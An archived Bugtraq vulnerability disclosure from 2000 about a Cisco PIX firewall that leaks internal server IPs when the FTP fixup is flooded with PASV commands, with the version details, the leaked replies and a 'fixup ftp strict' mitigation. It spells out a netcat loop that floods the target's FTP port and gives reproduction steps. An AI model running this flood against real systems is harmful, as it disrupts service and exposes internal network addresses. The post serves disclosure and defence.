Bugtraq mailing list archives

Cisco PIX Firewall allow external users to discover internal IPs


From: "Fabio Pietrosanti (naif)" <naif () INET IT>
Date: Tue, 3 Oct 2000 12:24:09 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi, the vulnerability in the Subject is explained here...

Attached file:
- Script used for DOS: pasvDOS.sh
- Log of the script: PIXLOG.first_172_16.bz2 & PIXLOG.second_172_16.bz2
- Log of debug: debug_ftp.txt.bz2
The log of the latest session against the second PIX, on which the service network
is 192.168.3.0/24, is at:
http://naif.itapac.net/PIXLOG_latest_192_168.bz2
because it's too big to attach to a mailing list.

====
PIX TESTED:
Cisco Secure PIX Firewall Version 5.2(2)

Compiled on Sun 24-Sep-00 18:59 by morlee

skifo-pix up 16 hours 55 mins

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.5685, irq 11
1: ethernet1: address is 00e0.b601.cfbd, irq 15
2: ethernet2: address is 00e0.b601.cfbc, irq 10
3: ethernet3: address is 00e0.b601.cfbb, irq 9
4: ethernet4: address is 00e0.b601.cfba, irq 11
5: ethernet5: address is 00d0.b790.512e, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Disabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited

Cisco released 5.2(4) yesterday, and it's time for a 5.2(5) :(

I've tried to fill PIX memory with the attached pasvDOS.sh shell script piped through netcat, but
I obtained other results...

then from cmd line:

<naif@naif> [~] $ (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do 
(sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&

but before starting the "PASV FLOOD" I start logging my ssh session, so we have a log of all the FTP FIXUP DEBUG output...

<naif@naif> [~] $ script debug_ftp.txt

The PIX starts revealing the real IP of the server to me immediately after
it kicks me off from ssh with the following error:

Local: Corrupted check bytes on input.

NOW it starts replying to my PASV command with the REAL internal IP address of the server...

===== Normal Situation
227 Entering Passive Mode (xxx,xxx,xxx,xx,18,237)
===== Under this kind of DoS, after the 21st ftp session that floods the PIX with PASV
227 Entering Passive Mode (172,16,1,2,6,113)

After I changed the PIX and network, on another PIX with 5.2(2), I could receive with
this DoS:
227 Entering Passive Mode (192,168,3,2,99,37)
Et voila'...

Trying to reproduce this kind of DoS/exploit, it works only sometimes...
after a reload it usually works after this:

- I start  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do (sleep 2; 
(./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&
- I leave it running for some minutes
- I kill all connections by killing the "nc" process
- Wait for 2/3 minutes
- Restart with  (for i in 1 2 3 4 5 6 7 8 9 10 11 12 13 14  15 16 17 18 19 20 21 22 23  24 25 26 27 28 29 30; do 
(sleep 2; (./pasvDOS.sh  | nc eagletmp 21)& )  ; done) >>PIXLOG&

but I cannot figure out why.


I notice that using "fixup ftp strict 21" could block this kind of attack,
and the error in debug is:

get_cmd: ERR: command not terminated

but it's also true that with "fixup ftp strict 21" many ftp clients don't work with the ftp server inside the PIX...


P.S. All ppl now know that "mork" has to offer me a lunch ;)

Pietrosanti  Fabio (naif)
E-mail: naif () inet it         
PGP Key (DSS)                           http://naif.itapac.net/naif.asc
 --
Free advertising: www.openbsd.org - Multiplatform Ultra-secure OS

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org
Filter: gpg4pine 4.1 (http://azzie.robotics.net)

iD8DBQE52bPQdK5I1NnlcMYRAjN7AKDTZSntnK6lmtFqq3r9WtWR6TJnIgCfQ8LN
MhtFpAc2KZMcrcOf82OAaJk=
=uso7
-----END PGP SIGNATURE-----

Attachments:
- pasvDOS.sh
- PIXLOG.first_172_16.bz2
- PIXLOG.second_172_16.bz2
- debug_ftp.txt.bz2

